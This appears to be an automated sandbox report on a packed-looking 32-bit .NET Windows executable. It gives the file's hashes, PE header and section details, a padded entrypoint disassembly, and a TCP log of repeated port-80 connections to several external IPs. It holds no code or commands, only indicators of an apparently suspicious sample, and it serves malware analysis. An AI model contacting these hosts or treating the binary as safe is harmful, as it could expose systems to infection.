SHA1:	dbb672289a9ebde17cb77424615a1c186995d1f3
SHA256:	f6eb53bca5075725d889aa5de1f4541cd764bed2bd46aeefcfa4a1b018b6a4fb
SHA512:	824e7e7cdccb4d60f72ad70fd73ea8184b1ed7b1d7b2e9a9426ec58380f3f4f769bee8b55d5d8c2450a6bfe37a2f737cc6a88c77e6bf1dde1984edc8c4e3b75c
SSDEEP:	6144:Z4CJRQliHM5ZsM5Iszp/znpBIZYJrAHAY7e1+vJmuxt:VuYMx5IshzrInH34+Bmuxt
TLSH:	5F54227EBFF4567EC075C6324EE354522AE1103E2E03AA6D6E976338DC24BD327154A2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....u.c..............0..^...d......R}... ........@.. ....................................`................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x447d52
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x63D075C5 [Wed Jan 25 00:20:21 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x47cf8	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4a000	0x578	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x48000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x45aec	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x45d58	0x45e00	False	0.9817929617620751	data	7.984487809492925	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc	0x48000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x4a000	0x578	0x600	False	0.41015625	data	4.007607933592501	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x4a0a0	0x2ec	data
RT_MANIFEST	0x4a38c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 25, 2023 13:21:50.032677889 CET	49700	80	192.168.2.3	2.57.90.16
Jan 25, 2023 13:21:50.065399885 CET	80	49700	2.57.90.16	192.168.2.3
Jan 25, 2023 13:21:50.067440033 CET	49700	80	192.168.2.3	2.57.90.16
Jan 25, 2023 13:21:50.067547083 CET	49700	80	192.168.2.3	2.57.90.16
Jan 25, 2023 13:21:50.100075006 CET	80	49700	2.57.90.16	192.168.2.3
Jan 25, 2023 13:21:50.100114107 CET	80	49700	2.57.90.16	192.168.2.3
Jan 25, 2023 13:21:50.100135088 CET	80	49700	2.57.90.16	192.168.2.3
Jan 25, 2023 13:21:50.100583076 CET	49700	80	192.168.2.3	2.57.90.16
Jan 25, 2023 13:21:50.100615978 CET	49700	80	192.168.2.3	2.57.90.16
Jan 25, 2023 13:21:50.133364916 CET	80	49700	2.57.90.16	192.168.2.3
Jan 25, 2023 13:21:55.242799997 CET	49702	80	192.168.2.3	185.151.199.52
Jan 25, 2023 13:21:55.313725948 CET	80	49702	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:55.313987970 CET	49702	80	192.168.2.3	185.151.199.52
Jan 25, 2023 13:21:55.314254999 CET	49702	80	192.168.2.3	185.151.199.52
Jan 25, 2023 13:21:55.385319948 CET	80	49702	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:56.579690933 CET	80	49702	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:56.579727888 CET	80	49702	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:56.579752922 CET	80	49702	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:56.579777956 CET	80	49702	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:56.579802990 CET	80	49702	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:56.579802990 CET	49702	80	192.168.2.3	185.151.199.52
Jan 25, 2023 13:21:56.579828024 CET	80	49702	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:56.579829931 CET	49702	80	192.168.2.3	185.151.199.52
Jan 25, 2023 13:21:56.579849958 CET	80	49702	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:56.579860926 CET	49702	80	192.168.2.3	185.151.199.52
Jan 25, 2023 13:21:56.579874039 CET	80	49702	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:56.579896927 CET	80	49702	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:56.579921007 CET	80	49702	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:56.579926014 CET	49702	80	192.168.2.3	185.151.199.52
Jan 25, 2023 13:21:56.579955101 CET	49702	80	192.168.2.3	185.151.199.52
Jan 25, 2023 13:21:56.650919914 CET	80	49702	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:56.650984049 CET	80	49702	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:56.651005030 CET	80	49702	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:56.651025057 CET	80	49702	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:56.651046038 CET	80	49702	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:56.651067019 CET	49702	80	192.168.2.3	185.151.199.52
Jan 25, 2023 13:21:56.651135921 CET	49702	80	192.168.2.3	185.151.199.52
Jan 25, 2023 13:21:56.820725918 CET	49702	80	192.168.2.3	185.151.199.52
Jan 25, 2023 13:21:57.836958885 CET	49703	80	192.168.2.3	185.151.199.52
Jan 25, 2023 13:21:57.913969994 CET	80	49703	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:57.914197922 CET	49703	80	192.168.2.3	185.151.199.52
Jan 25, 2023 13:21:57.914727926 CET	49703	80	192.168.2.3	185.151.199.52
Jan 25, 2023 13:21:57.989352942 CET	80	49703	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:57.990883112 CET	80	49703	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:59.122298002 CET	80	49703	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:59.122395992 CET	80	49703	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:59.122471094 CET	80	49703	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:59.122529030 CET	49703	80	192.168.2.3	185.151.199.52
Jan 25, 2023 13:21:59.122541904 CET	80	49703	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:59.122610092 CET	49703	80	192.168.2.3	185.151.199.52
Jan 25, 2023 13:21:59.122622967 CET	80	49703	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:59.122684002 CET	80	49703	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:59.122760057 CET	49703	80	192.168.2.3	185.151.199.52
Jan 25, 2023 13:21:59.122805119 CET	80	49703	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:59.122869015 CET	80	49703	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:59.122936010 CET	80	49703	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:59.122936964 CET	49703	80	192.168.2.3	185.151.199.52
Jan 25, 2023 13:21:59.123001099 CET	80	49703	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:59.123064041 CET	49703	80	192.168.2.3	185.151.199.52
Jan 25, 2023 13:21:59.195797920 CET	80	49703	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:59.195836067 CET	80	49703	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:59.195857048 CET	80	49703	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:59.195882082 CET	80	49703	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:59.195903063 CET	80	49703	185.151.199.52	192.168.2.3
Jan 25, 2023 13:21:59.196007967 CET	49703	80	192.168.2.3	185.151.199.52
Jan 25, 2023 13:21:59.196079969 CET	49703	80	192.168.2.3	185.151.199.52
Jan 25, 2023 13:21:59.430351019 CET	49703	80	192.168.2.3	185.151.199.52
Jan 25, 2023 13:22:00.447555065 CET	49704	80	192.168.2.3	185.151.199.52
Jan 25, 2023 13:22:00.517348051 CET	80	49704	185.151.199.52	192.168.2.3
Jan 25, 2023 13:22:00.517499924 CET	49704	80	192.168.2.3	185.151.199.52
Jan 25, 2023 13:22:00.517616034 CET	49704	80	192.168.2.3	185.151.199.52
Jan 25, 2023 13:22:00.586491108 CET	80	49704	185.151.199.52	192.168.2.3
Jan 25, 2023 13:22:02.529448986 CET	80	49704	185.151.199.52	192.168.2.3
Jan 25, 2023 13:22:02.529485941 CET	80	49704	185.151.199.52	192.168.2.3
Jan 25, 2023 13:22:02.529717922 CET	49704	80	192.168.2.3	185.151.199.52
Jan 25, 2023 13:22:02.538366079 CET	49704	80	192.168.2.3	185.151.199.52
Jan 25, 2023 13:22:02.607451916 CET	80	49704	185.151.199.52	192.168.2.3
Jan 25, 2023 13:22:07.856199980 CET	49705	80	192.168.2.3	164.88.201.214
Jan 25, 2023 13:22:08.081341028 CET	80	49705	164.88.201.214	192.168.2.3
Jan 25, 2023 13:22:08.082045078 CET	49705	80	192.168.2.3	164.88.201.214
Jan 25, 2023 13:22:08.082201958 CET	49705	80	192.168.2.3	164.88.201.214
Jan 25, 2023 13:22:08.307843924 CET	80	49705	164.88.201.214	192.168.2.3
Jan 25, 2023 13:22:08.307883978 CET	80	49705	164.88.201.214	192.168.2.3
Jan 25, 2023 13:22:08.307905912 CET	80	49705	164.88.201.214	192.168.2.3
Jan 25, 2023 13:22:08.307965040 CET	49705	80	192.168.2.3	164.88.201.214
Jan 25, 2023 13:22:09.587357044 CET	49705	80	192.168.2.3	164.88.201.214
Jan 25, 2023 13:22:10.603462934 CET	49706	80	192.168.2.3	164.88.201.214
Jan 25, 2023 13:22:10.811943054 CET	80	49706	164.88.201.214	192.168.2.3
Jan 25, 2023 13:22:10.812129974 CET	49706	80	192.168.2.3	164.88.201.214
Jan 25, 2023 13:22:10.812534094 CET	49706	80	192.168.2.3	164.88.201.214
Jan 25, 2023 13:22:11.021099091 CET	80	49706	164.88.201.214	192.168.2.3
Jan 25, 2023 13:22:11.021210909 CET	80	49706	164.88.201.214	192.168.2.3
Jan 25, 2023 13:22:11.021265984 CET	80	49706	164.88.201.214	192.168.2.3
Jan 25, 2023 13:22:11.021456003 CET	80	49706	164.88.201.214	192.168.2.3
Jan 25, 2023 13:22:11.021501064 CET	80	49706	164.88.201.214	192.168.2.3
Jan 25, 2023 13:22:11.021693945 CET	49706	80	192.168.2.3	164.88.201.214
Jan 25, 2023 13:22:12.326932907 CET	49706	80	192.168.2.3	164.88.201.214
Jan 25, 2023 13:22:13.337982893 CET	49707	80	192.168.2.3	164.88.201.214
Jan 25, 2023 13:22:13.546649933 CET	80	49707	164.88.201.214	192.168.2.3
Jan 25, 2023 13:22:13.546766043 CET	49707	80	192.168.2.3	164.88.201.214
Jan 25, 2023 13:22:13.546900988 CET	49707	80	192.168.2.3	164.88.201.214
Jan 25, 2023 13:22:13.755445957 CET	80	49707	164.88.201.214	192.168.2.3
Jan 25, 2023 13:22:13.755505085 CET	80	49707	164.88.201.214	192.168.2.3
Jan 25, 2023 13:22:13.755542994 CET	80	49707	164.88.201.214	192.168.2.3
Jan 25, 2023 13:22:13.755675077 CET	49707	80	192.168.2.3	164.88.201.214
Jan 25, 2023 13:22:13.755822897 CET	49707	80	192.168.2.3	164.88.201.214
Jan 25, 2023 13:22:13.964066029 CET	80	49707	164.88.201.214	192.168.2.3
Jan 25, 2023 13:22:18.789400101 CET	49708	80	192.168.2.3	18.138.206.213
Jan 25, 2023 13:22:18.995368958 CET	80	49708	18.138.206.213	192.168.2.3
Jan 25, 2023 13:22:18.995508909 CET	49708	80	192.168.2.3	18.138.206.213
Jan 25, 2023 13:22:18.995636940 CET	49708	80	192.168.2.3	18.138.206.213
Jan 25, 2023 13:22:19.202503920 CET	80	49708	18.138.206.213	192.168.2.3
Jan 25, 2023 13:22:19.202574015 CET	80	49708	18.138.206.213	192.168.2.3
Jan 25, 2023 13:22:19.202616930 CET	80	49708	18.138.206.213	192.168.2.3
Jan 25, 2023 13:22:19.202843904 CET	49708	80	192.168.2.3	18.138.206.213
Jan 25, 2023 13:22:20.512428999 CET	49708	80	192.168.2.3	18.138.206.213
Jan 25, 2023 13:22:21.526400089 CET	49709	80	192.168.2.3	18.138.206.213
Jan 25, 2023 13:22:21.727159023 CET	80	49709	18.138.206.213	192.168.2.3
Jan 25, 2023 13:22:21.727319002 CET	49709	80	192.168.2.3	18.138.206.213
Jan 25, 2023 13:22:21.727606058 CET	49709	80	192.168.2.3	18.138.206.213
Jan 25, 2023 13:22:21.927716017 CET	80	49709	18.138.206.213	192.168.2.3
Jan 25, 2023 13:22:21.927761078 CET	80	49709	18.138.206.213	192.168.2.3
Jan 25, 2023 13:22:21.927786112 CET	80	49709	18.138.206.213	192.168.2.3
Jan 25, 2023 13:22:21.927860022 CET	80	49709	18.138.206.213	192.168.2.3
Jan 25, 2023 13:22:21.927886009 CET	80	49709	18.138.206.213	192.168.2.3
Jan 25, 2023 13:22:21.927990913 CET	49709	80	192.168.2.3	18.138.206.213
Jan 25, 2023 13:22:23.229223013 CET	49709	80	192.168.2.3	18.138.206.213
Jan 25, 2023 13:22:24.246615887 CET	49710	80	192.168.2.3	18.138.206.213
Jan 25, 2023 13:22:24.450134993 CET	80	49710	18.138.206.213	192.168.2.3
Jan 25, 2023 13:22:24.450334072 CET	49710	80	192.168.2.3	18.138.206.213
Jan 25, 2023 13:22:24.450882912 CET	49710	80	192.168.2.3	18.138.206.213
Jan 25, 2023 13:22:24.653695107 CET	80	49710	18.138.206.213	192.168.2.3
Jan 25, 2023 13:22:24.653743029 CET	80	49710	18.138.206.213	192.168.2.3
Jan 25, 2023 13:22:24.653769016 CET	80	49710	18.138.206.213	192.168.2.3
Jan 25, 2023 13:22:24.654345989 CET	49710	80	192.168.2.3	18.138.206.213
Jan 25, 2023 13:22:24.654702902 CET	49710	80	192.168.2.3	18.138.206.213
Jan 25, 2023 13:22:24.857518911 CET	80	49710	18.138.206.213	192.168.2.3
Jan 25, 2023 13:22:29.711541891 CET	49711	80	192.168.2.3	184.94.215.91
Jan 25, 2023 13:22:29.886873007 CET	80	49711	184.94.215.91	192.168.2.3
Jan 25, 2023 13:22:29.887013912 CET	49711	80	192.168.2.3	184.94.215.91
Jan 25, 2023 13:22:29.887149096 CET	49711	80	192.168.2.3	184.94.215.91
Jan 25, 2023 13:22:30.062314034 CET	80	49711	184.94.215.91	192.168.2.3
Jan 25, 2023 13:22:30.155711889 CET	80	49711	184.94.215.91	192.168.2.3
Jan 25, 2023 13:22:30.155781031 CET	80	49711	184.94.215.91	192.168.2.3
Jan 25, 2023 13:22:30.155831099 CET	80	49711	184.94.215.91	192.168.2.3
Jan 25, 2023 13:22:30.155885935 CET	80	49711	184.94.215.91	192.168.2.3
Jan 25, 2023 13:22:30.155888081 CET	49711	80	192.168.2.3	184.94.215.91
Jan 25, 2023 13:22:30.155932903 CET	80	49711	184.94.215.91	192.168.2.3
Jan 25, 2023 13:22:30.155946016 CET	49711	80	192.168.2.3	184.94.215.91
Jan 25, 2023 13:22:30.156001091 CET	49711	80	192.168.2.3	184.94.215.91
Jan 25, 2023 13:22:31.401726961 CET	49711	80	192.168.2.3	184.94.215.91
Jan 25, 2023 13:22:32.417939901 CET	49712	80	192.168.2.3	184.94.215.91
Jan 25, 2023 13:22:32.593097925 CET	80	49712	184.94.215.91	192.168.2.3
Jan 25, 2023 13:22:32.593255997 CET	49712	80	192.168.2.3	184.94.215.91
Jan 25, 2023 13:22:32.593597889 CET	49712	80	192.168.2.3	184.94.215.91
Jan 25, 2023 13:22:32.768551111 CET	80	49712	184.94.215.91	192.168.2.3
Jan 25, 2023 13:22:32.768583059 CET	80	49712	184.94.215.91	192.168.2.3
Jan 25, 2023 13:22:32.908425093 CET	80	49712	184.94.215.91	192.168.2.3
Jan 25, 2023 13:22:32.908461094 CET	80	49712	184.94.215.91	192.168.2.3
Jan 25, 2023 13:22:32.908483028 CET	80	49712	184.94.215.91	192.168.2.3
Jan 25, 2023 13:22:32.908507109 CET	80	49712	184.94.215.91	192.168.2.3
Jan 25, 2023 13:22:32.908524990 CET	80	49712	184.94.215.91	192.168.2.3
Jan 25, 2023 13:22:32.908638000 CET	49712	80	192.168.2.3	184.94.215.91
Jan 25, 2023 13:22:32.908706903 CET	49712	80	192.168.2.3	184.94.215.91
Jan 25, 2023 13:22:34.105770111 CET	49712	80	192.168.2.3	184.94.215.91
Jan 25, 2023 13:22:35.150978088 CET	49713	80	192.168.2.3	184.94.215.91
Jan 25, 2023 13:22:35.326179981 CET	80	49713	184.94.215.91	192.168.2.3
Jan 25, 2023 13:22:35.326554060 CET	49713	80	192.168.2.3	184.94.215.91
Jan 25, 2023 13:22:35.326555014 CET	49713	80	192.168.2.3	184.94.215.91
Jan 25, 2023 13:22:35.501795053 CET	80	49713	184.94.215.91	192.168.2.3
Jan 25, 2023 13:22:35.598840952 CET	80	49713	184.94.215.91	192.168.2.3
Jan 25, 2023 13:22:35.598901033 CET	80	49713	184.94.215.91	192.168.2.3
Jan 25, 2023 13:22:35.598949909 CET	80	49713	184.94.215.91	192.168.2.3
Jan 25, 2023 13:22:35.599000931 CET	80	49713	184.94.215.91	192.168.2.3
Jan 25, 2023 13:22:35.599037886 CET	49713	80	192.168.2.3	184.94.215.91
Jan 25, 2023 13:22:35.599042892 CET	80	49713	184.94.215.91	192.168.2.3
Jan 25, 2023 13:22:35.599083900 CET	80	49713	184.94.215.91	192.168.2.3
Jan 25, 2023 13:22:35.599085093 CET	49713	80	192.168.2.3	184.94.215.91
Jan 25, 2023 13:22:35.599138975 CET	49713	80	192.168.2.3	184.94.215.91
Jan 25, 2023 13:22:35.599366903 CET	49713	80	192.168.2.3	184.94.215.91
Jan 25, 2023 13:22:35.774369001 CET	80	49713	184.94.215.91	192.168.2.3
Jan 25, 2023 13:22:40.750442982 CET	49714	80	192.168.2.3	103.221.223.104
Jan 25, 2023 13:22:41.043922901 CET	80	49714	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:41.044162989 CET	49714	80	192.168.2.3	103.221.223.104
Jan 25, 2023 13:22:41.044262886 CET	49714	80	192.168.2.3	103.221.223.104
Jan 25, 2023 13:22:41.337848902 CET	80	49714	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:41.409465075 CET	80	49714	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:41.409533024 CET	80	49714	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:41.409584045 CET	80	49714	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:41.409621954 CET	49714	80	192.168.2.3	103.221.223.104
Jan 25, 2023 13:22:41.409634113 CET	80	49714	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:41.409688950 CET	80	49714	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:41.409739017 CET	80	49714	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:41.409746885 CET	49714	80	192.168.2.3	103.221.223.104
Jan 25, 2023 13:22:41.409934998 CET	49714	80	192.168.2.3	103.221.223.104
Jan 25, 2023 13:22:41.410799980 CET	80	49714	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:41.410887957 CET	80	49714	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:41.410923958 CET	80	49714	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:41.410959005 CET	80	49714	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:41.410985947 CET	49714	80	192.168.2.3	103.221.223.104
Jan 25, 2023 13:22:41.411015987 CET	49714	80	192.168.2.3	103.221.223.104
Jan 25, 2023 13:22:42.559439898 CET	49714	80	192.168.2.3	103.221.223.104
Jan 25, 2023 13:22:43.580554962 CET	49715	80	192.168.2.3	103.221.223.104
Jan 25, 2023 13:22:43.874635935 CET	80	49715	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:43.874756098 CET	49715	80	192.168.2.3	103.221.223.104
Jan 25, 2023 13:22:43.874982119 CET	49715	80	192.168.2.3	103.221.223.104
Jan 25, 2023 13:22:44.168771029 CET	80	49715	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:44.168801069 CET	80	49715	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:44.243750095 CET	80	49715	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:44.243786097 CET	80	49715	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:44.243803978 CET	80	49715	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:44.243823051 CET	80	49715	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:44.243844986 CET	80	49715	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:44.243881941 CET	49715	80	192.168.2.3	103.221.223.104
Jan 25, 2023 13:22:44.243942022 CET	49715	80	192.168.2.3	103.221.223.104
Jan 25, 2023 13:22:44.244452953 CET	80	49715	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:44.244512081 CET	49715	80	192.168.2.3	103.221.223.104
Jan 25, 2023 13:22:44.245076895 CET	80	49715	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:44.245099068 CET	80	49715	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:44.245114088 CET	80	49715	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:44.245127916 CET	80	49715	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:44.245161057 CET	49715	80	192.168.2.3	103.221.223.104
Jan 25, 2023 13:22:44.245189905 CET	49715	80	192.168.2.3	103.221.223.104
Jan 25, 2023 13:22:45.116727114 CET	80	49715	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:46.403934956 CET	49716	80	192.168.2.3	103.221.223.104
Jan 25, 2023 13:22:46.693001032 CET	80	49716	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:46.693114042 CET	49716	80	192.168.2.3	103.221.223.104
Jan 25, 2023 13:22:46.693219900 CET	49716	80	192.168.2.3	103.221.223.104
Jan 25, 2023 13:22:46.982007027 CET	80	49716	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:47.028659105 CET	80	49716	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:47.028707027 CET	80	49716	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:47.028887033 CET	49716	80	192.168.2.3	103.221.223.104
Jan 25, 2023 13:22:47.029154062 CET	49716	80	192.168.2.3	103.221.223.104
Jan 25, 2023 13:22:47.317817926 CET	80	49716	103.221.223.104	192.168.2.3
Jan 25, 2023 13:22:52.083801031 CET	49717	80	192.168.2.3	76.223.105.230
Jan 25, 2023 13:22:52.103096008 CET	80	49717	76.223.105.230	192.168.2.3
Jan 25, 2023 13:22:52.103975058 CET	49717	80	192.168.2.3	76.223.105.230
Jan 25, 2023 13:22:52.103975058 CET	49717	80	192.168.2.3	76.223.105.230
Jan 25, 2023 13:22:52.123193979 CET	80	49717	76.223.105.230	192.168.2.3
Jan 25, 2023 13:22:52.125593901 CET	80	49717	76.223.105.230	192.168.2.3
Jan 25, 2023 13:22:52.125633955 CET	80	49717	76.223.105.230	192.168.2.3
Jan 25, 2023 13:22:52.125736952 CET	49717	80	192.168.2.3	76.223.105.230
Jan 25, 2023 13:22:52.139291048 CET	80	49717	76.223.105.230	192.168.2.3
Jan 25, 2023 13:22:52.141633987 CET	49717	80	192.168.2.3	76.223.105.230
Jan 25, 2023 13:22:53.606904030 CET	49717	80	192.168.2.3	76.223.105.230
Jan 25, 2023 13:22:54.624715090 CET	49718	80	192.168.2.3	76.223.105.230
Jan 25, 2023 13:22:54.643990993 CET	80	49718	76.223.105.230	192.168.2.3
Jan 25, 2023 13:22:54.644221067 CET	49718	80	192.168.2.3	76.223.105.230
Jan 25, 2023 13:22:54.644524097 CET	49718	80	192.168.2.3	76.223.105.230
Jan 25, 2023 13:22:54.663741112 CET	80	49718	76.223.105.230	192.168.2.3
Jan 25, 2023 13:22:54.663786888 CET	80	49718	76.223.105.230	192.168.2.3
Jan 25, 2023 13:22:54.663819075 CET	80	49718	76.223.105.230	192.168.2.3
Jan 25, 2023 13:22:54.663853884 CET	80	49718	76.223.105.230	192.168.2.3
Jan 25, 2023 13:22:54.663892031 CET	80	49718	76.223.105.230	192.168.2.3
Jan 25, 2023 13:22:54.666603088 CET	80	49718	76.223.105.230	192.168.2.3
Jan 25, 2023 13:22:54.666654110 CET	80	49718	76.223.105.230	192.168.2.3
Jan 25, 2023 13:22:54.666891098 CET	49718	80	192.168.2.3	76.223.105.230
Jan 25, 2023 13:22:54.679231882 CET	80	49718	76.223.105.230	192.168.2.3
Jan 25, 2023 13:22:54.679394960 CET	49718	80	192.168.2.3	76.223.105.230
Jan 25, 2023 13:22:56.153842926 CET	49718	80	192.168.2.3	76.223.105.230
Jan 25, 2023 13:22:57.173399925 CET	49719	80	192.168.2.3	76.223.105.230
Jan 25, 2023 13:22:57.192831039 CET	80	49719	76.223.105.230	192.168.2.3
Jan 25, 2023 13:22:57.196180105 CET	49719	80	192.168.2.3	76.223.105.230
Jan 25, 2023 13:22:57.196432114 CET	49719	80	192.168.2.3	76.223.105.230
Jan 25, 2023 13:22:57.215744972 CET	80	49719	76.223.105.230	192.168.2.3
Jan 25, 2023 13:22:57.219901085 CET	80	49719	76.223.105.230	192.168.2.3
Jan 25, 2023 13:22:57.219947100 CET	80	49719	76.223.105.230	192.168.2.3
Jan 25, 2023 13:22:57.220230103 CET	49719	80	192.168.2.3	76.223.105.230
Jan 25, 2023 13:22:57.220614910 CET	49719	80	192.168.2.3	76.223.105.230
